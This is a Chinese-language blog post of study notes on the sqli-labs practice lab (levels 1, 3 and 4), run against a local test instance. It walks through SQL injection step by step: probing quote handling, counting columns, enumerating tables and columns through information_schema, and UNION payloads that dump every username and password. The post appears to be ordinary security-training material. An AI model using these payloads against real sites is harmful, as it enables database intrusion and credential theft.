sqli-labs less1 &&less3&&less4学习心得

0x01.less1

 

id=1/ id=1 and 1=1结果正常

id=1 and 1=2结果正常,不合理

id=1'提示:

分析:

use near '   '   1'   ' LIMIT 0,1    '

所以正确sql语句 为:

select username,password from table where id='input'

所以:

id = 1' and '1'='1

结果正确

即:

select username,password from table where id='1' and '1'='1'

或者:

id = 1' and 1=1 --+

结果正确

即:

select username,password from table where id='1' and 1=1 --+'

 

0x02.less03

 

输入:

http://127.0.0.1/Sqli-Labs/Less-3/?id=1 and 1=2

得到:

 所以存在sql注入漏洞

于是输入:

id=1'得到提示:

near '      '     1'     ') LIMIT 0,1      ' at line 1

 

所以 猜测sql语句为:

select username,password from table where id = ('input')

 

所以注入语句可以是:

id=1') and  ('1'='1

即:select username,password from table where id = ('1') and  ('1'='1')

注入成功

或者:

id=1') and 1=1 --+

即:select username,password from table where id = ('1') and 1=1 --+')

注入成功

 

0x04.less4

注入语句:

http://127.0.0.1/Sqli-Labs/Less-4/?id=1") and 1=2 --+

或者:

http://127.0.0.1/Sqli-Labs/Less-4/?id=(1" and "1=2

 

测试:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=1") order by 3 --+
字段为3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,2,3 --+

可以利用的字段为2,3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' --+

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' limit 3,1 --+

第4个表名:

 

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='secu
rity' --+

4 个表名全部显示 :

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

显示列名:

 

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(username,password),3 from users --+

显示users表里所有的用户名和密码:

 

 

posted @ 2017-11-21 21:28  S_s_s  阅读(326)  评论(0编辑  收藏